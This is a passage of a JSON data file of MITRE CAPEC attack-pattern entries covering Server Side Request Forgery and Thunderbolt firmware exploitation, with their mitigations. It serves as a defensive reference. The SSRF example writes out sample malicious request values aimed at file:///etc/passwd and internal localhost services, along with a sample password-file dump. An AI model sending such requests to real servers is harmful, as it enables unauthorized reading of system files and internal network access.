"attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable SharedArrayBuffer for Web Browsers", + "id": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-3", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--183b50f2-3b70-46cf-94a6-bfa6c657652d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Copy-on-Write between Cloud VMs", + "id": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e9cc3819-f8ef-4590-96ab-5d9ddb6a9bb6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Privilege Checks on Cache Flush 
Instructions", + "id": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224b0c6b-54cf-408c-9215-be2bc2bb613b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks", + "id": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cbb16a5-1749-47ba-8527-a912d9298189", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + 
}, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.\n ", + "external_references": [ + { + "external_id": "CAPEC-664", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-918", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/918.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "OWASP SSRF Bible, 2017--01---26, OWASP", + "external_id": "REF-644", + "source_name": "reference_from_CAPEC", + "url": "https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf" + }, + { + "description": "Server Side Request Forgery, PortSwigger", + "external_id": "REF-645", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/ssrf" + }, + { + "description": "CallStranger Vulnerability, 2020--06---08, Yunus Cadirici", + "external_id": "REF-646", + "source_name": "reference_from_CAPEC", + "url": 
"https://github.com/yunuscadirci/CallStranger" + } + ], + "id": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Server Side Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009", + "attack-pattern--5a33bee7-5ec9-4e75-9bf6-99fdaca8699c", + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Availability": [ + "Modify Data", + "Resource Consumption" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. 
The request may look something like:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory\n \n A malicious user can modify the request URL to look like this instead:\n \n POST /product/category HTTP/1.0\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 200\n vulnerableService=http://localhost/server-status\n \n or\n \n vulnerableService = file:///etc/passwd\n \n or\n \n vulnerableService=dict://localhost:12345/info\n \n If the exploit is successful, the server may return the data requested by the adversary\n \n root:!:0:0::/:/usr/bin/ksh\n daemon:!:1:1::/etc:\n bin:!:2:2::/bin:\n sys:!:3:3::/usr/sys:\n adm:!:4:4::/var/adm:\n uucp:!:5:5::/usr/lib/uucp:\n guest:!:100:100::/home/guest:\n nobody:!:4294967294:4294967294::/:\n lpd:!:9:4294967294::/:\n lp:*:11:11::/var/spool/lp:/bin/false\n invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n paul:!:201:1::/home/paul:/usr/bin/ksh\n jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh\n \n ", + "\n The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. 
[REF-646]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target application: Find target web application that accepts a user input and retrieves data from the server

Experiment

  1. Examine existing application requests: Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application's protection to Server Side Request Forgery

  2. Techniques
    Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.
    Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.
    Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output.

Exploit

  1. Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Server must be running a web application that processes HTTP requests." + ], + "x_capec_resources_required": [ + "[None] No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.", + "Medium": "The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Handling incoming requests securely is the first line of action to mitigate this vulnerability. 
This can be done through URL validation.", + "id": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6377c3e9-f7ce-470a-935c-754995e66989", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5e3f94c-6f9c-4f58-b75f-fe7481005864", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.", + "id": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df4b3787-fb80-4016-b3ec-7b279539e710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.", + "id": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--814c7fba-41b2-4ab4-b0a9-1c73b58b395f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac64feac-f01a-4022-85b1-0b00aca231bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. 
By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.", + "id": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fab9925e-dd41-45aa-bae8-f2d7f2595513", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b33aeecf-33f4-456f-8711-f726e12e6fe1", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. 
can be prevented.", + "id": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. 
Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.\n ", + "external_references": [ + { + "external_id": "CAPEC-665", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/665.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-1188", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1188.html" + }, + { + "external_id": "CWE-862", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/862.html" + }, + { + "description": "Exploitation for Defensive Evasion", + "external_id": "T1211", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1211" + }, + { + "description": "Pre-OS Boot: Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "Modify Authentication Process", + "external_id": "T1556", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556" + }, + { + "description": "Björn Ruytenberg, Thunderspy When Lighting Strikes Thrice: Breaking Thunderbolt 3 Security, 2020, Eindhoven University of Technology", + "external_id": "REF-647", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/" + }, + { + "description": "Björn Ruytenberg, Breaking Thunderbolt Protocol Security: Vulnerability Report, 2020--04---17, Eindhoven University of Technology", + "external_id": "REF-648", + "source_name": "reference_from_CAPEC", + "url": "https://thunderspy.io/assets/reports/breaking-thunderbolt-security-bjorn-ruytenberg-20200417.pdf" + }, 
+ { + "description": "Liam Tung, Thunderbolt flaws affect millions of computers – even locking unattended devices won't help, 2020--05---11, ZDNet", + "external_id": "REF-649", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/thunderbolt-flaws-affect-millions-of-computers-even-locking-unattended-devices-wont-help/" + }, + { + "description": "Liam Tung, Microsoft: Worried about Thunderbolt attacks? Get a Windows 10 Secured-Core PC, 2020--05---14, ZDNet", + "external_id": "REF-650", + "source_name": "reference_from_CAPEC", + "url": "https://www.zdnet.com/article/microsoft-worried-about-thunderbolt-attacks-get-a-windows-10-secured-core-pc/" + }, + { + "description": "Jon Porter, Thunderbolt flaw allows access to a PC’s data in minutes, 2020--05---11, The Verge", + "external_id": "REF-651", + "source_name": "reference_from_CAPEC", + "url": "https://www.theverge.com/2020/5/11/21254290/thunderbolt-security-vulnerability-thunderspy-encryption-access-intel-laptops" + }, + { + "description": "Jerry Bryant, MORE INFORMATION ON THUNDERBOLT(TM) SECURITY, 2020--05---10, Intel Corporation", + "external_id": "REF-652", + "source_name": "reference_from_CAPEC", + "url": "https://blogs.intel.com/technology/2020/05/more-information-on-thunderspy/#gs.0o6pmk" + } + ], + "id": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Thunderbolt Protection Flaws", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + 
"Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary's own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary's own system to copy, parse, and modify the victim's Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary's Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey physical victim environment and potential Thunderbolt system targets: The adversary monitors the target's physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state.

  2. Evaluate the target system and its Thunderbolt interface: The adversary determines the device's operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack.

Experiment

  1. Obtain and/or clone firmware image: The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller's SPI (Serial Peripheral Interface) flash.

  2. Techniques
    Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.
    Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.
    Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device.
  3. Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information: The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.

  4. Techniques
    Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.
    Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.
    Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.
    Locate data structure containing challenge-response key information between appropriate offsets.
  5. Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary): The adversary overrides the target device's Thunderbolt Security Level to \"None\" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.

  6. Techniques
    The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections.
  7. Modify/replace victim Thunderbolt firmware image: The modified victim and/or adversary thunderbolt firmware image is written to attacker SPI flash.

Exploit

  1. Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions: The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.

  2. Techniques
    Observe victim device identify adversary device as the victim device and enables PCIe tunneling.
    Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.
    Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of \"None\" (SL0)
    Observe after installation of Firmware update that within Thunderbolt Management UI the \"NVM version\" is unchanged/same prior to the prompt of successful Firmware update/installation.
  3. Exfiltration of desired data from victim device to adversary device: Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_peer_of_refs": [ + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_prerequisites": [ + "The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections." + ], + "x_capec_resources_required": [ + "SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as modification/spoofing of adversary-controlled Thunderbolt controller.", + "Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.", + "Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Kernel Direct Memory Access Protection", + "id": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a0e0f629-1901-46f1-84f7-14f999416101", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b971f4a8-9aee-4df6-b6ad-5af2b957670b", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface", + "id": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8cd41ad-b8ed-421f-9327-7fd7d7f1bb72", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ 
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6664c7ff-319e-4b06-997e-26ec9df89dad", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface", + "id": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92fe9893-60f3-4669-b1b1-49ee6fe775e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c46069-9202-46e1-8dea-548befc52658", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface with support for DP mode", + "id": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": 
